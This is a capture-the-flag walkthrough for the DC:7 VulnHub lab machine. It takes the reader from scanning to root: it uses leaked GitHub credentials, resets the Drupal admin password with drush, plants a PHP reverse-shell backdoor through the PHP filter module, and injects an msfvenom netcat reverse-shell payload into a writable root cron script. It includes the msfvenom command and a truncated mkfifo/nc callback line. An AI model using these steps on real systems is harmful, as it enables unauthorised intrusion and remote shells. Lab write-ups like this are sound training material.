DC:7 writeup, our another CTF challenges for CTF players
and it can be download from vulnhub from here. The
credit goes to “DCAU” for designing this VM machine for beginners. This is a
Linux based CTF challenge where you can use your basic pentest skill to
compromise this VM to escalate the root privilege shell.
Penetration Testing Methodologies
Network Scan
·
Nmap
Foot printing
Exploiting
·
SSH login
·
Abusing Drupal Drush
·
Compromising webshell via PHP Backdoor
Privilege Escalation
·
Abusing writable Script
·
Capture the Flag
Walkthrough
Network
Scanning
Let's start with a network scan using an aggressive Nmap
scan as we always do, and this time also we will go with the same approach for
identify open port for running services.
nmap -A 192.168.1.101
Hmmm! So nmap showed very
exciting & cool outcome, specifically on port 80 that is accessible to HTTP
service and is also used to operate drupal CMS, additionally 15 submissions for
robot.txt is like a cheery on a cake.
Enumeration
Further, we need to start enumeration against the host
machine, therefore without wasting time, we navigate to a web browser for
exploring HTTP service, and DC:7- Welcome page will opened in the browser that
gave us a hint to search “outside the box” and this hint might be connected
with internet.
At the end of this web page we observed another hint
“@DC7User” which could be any possible username.
By considering the above listed hint, we start footprinting
on the @DC7-user and find the DC7-user twitter account. This account contains a
link to GitHub: https:/github.com/Dc7User,
maybe the author was pointing to this link.
And the github url content a staffdb which is PHP
repositories.
So when we have opened the staffdb, here config.php looks
more interesting and a note i.e. as depicted below:
“This is some "code" (yes, it's not the
greatest code, but that wasn't the point) for the DC-7 challenge.
This isn't a flag, btw, but if you have made it here,
well done anyway. :-)”
We found credential from inside config.php as shown below:
Username: dc7user
Password: MdR3xOgB7#dW
With the help of above enumerated credential we try to
connect with ssh and after obtaining tty shell we go for post enumeration and
start directory traversing.
At first, we're looking for a directory list where we've
found an "mbox" named file that contains an inbox message. The
message contains /opt/script/backup.sh as subject of the message, let’s explore
more.
I
nside backup.sh we notice it is using drush
which is stands for Drupal shell and it is a command line utility that is used
to communicate with drupal CMS.
So, I looked at the drush command in google and found a
command that was used to change an account's password.
Therefore, we try to change admin password using below
command:
drush user-password admin --password=raj
Now, we've changed the password for the admin account to
login to Drupal and explore the following URL:
After accessing the admin console, it was time to exploit
web application by injecting malicious content inside it. Directly writing malicious
scripts as web content will not give us the reverse shell of the application but
after spending some time, we concluded that it requires PHP module. We,
therefore, move to install new module through Manage>Extend>List>Install
new module.
You can download the PHP package for Drupal from the URL
below and upload the tar file to install the new module.
https://www.drupal.org/project/php
So, when installation is completed, we need to enable to
added module.
Again, move to Manage > Extend >filters and enable
the check box for PHP filters.
Now use Pentest monkey PHP script i.e “reverse_shell_backdoor.php”
to be inject as basic content. Do not forget to add listening IP and Port for
obtaining reverse connection. Further change text format into PHP and enable
the check box for publish. Keep the netcat listener ON to receive incoming
shell.
Now use the Pentest monkey PHP script, i.e. "reverse
shell backdoor.php" to be injected as a basic content. Don't forget to add
an “listening IP & port” to get a reversed connection. Continue to change
the “text format to PHP” and enable the publishing checkbox. Keep the netcat
listener ON in order to receive the incoming shell.
When everything is set correctly, click the preview button
and you'll get the reverse connection over the netcat.
Great!! we have our netcat session as www-data and if you
will check permission on /opt/scripts/backup.sh, you will notice, that www-data
has all permission to access or modify this file. We can therefore abuse the
rights of the user file for escalating privileges by modifying the contents of
the source.
Privilege Escalation
As said above we’ll try to abuse writable permission assign
on the script. Thus, we use msfvenom to generate a malicious piece of code for
obtaining bash shell.
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.106
lport=8888 R
Now copy the generated code and start a another netcat
listener on a new terminal.
mkfifo /tmp/ulgg; nc 192.168.1.106 8888 0
Paste the code copied above in the previous netcat session
under the www-data shell and wait for some time and get back to another netcat
listener.
After some time, you will have access to the root shell, you
will now get the final flag in the root directory as shown below.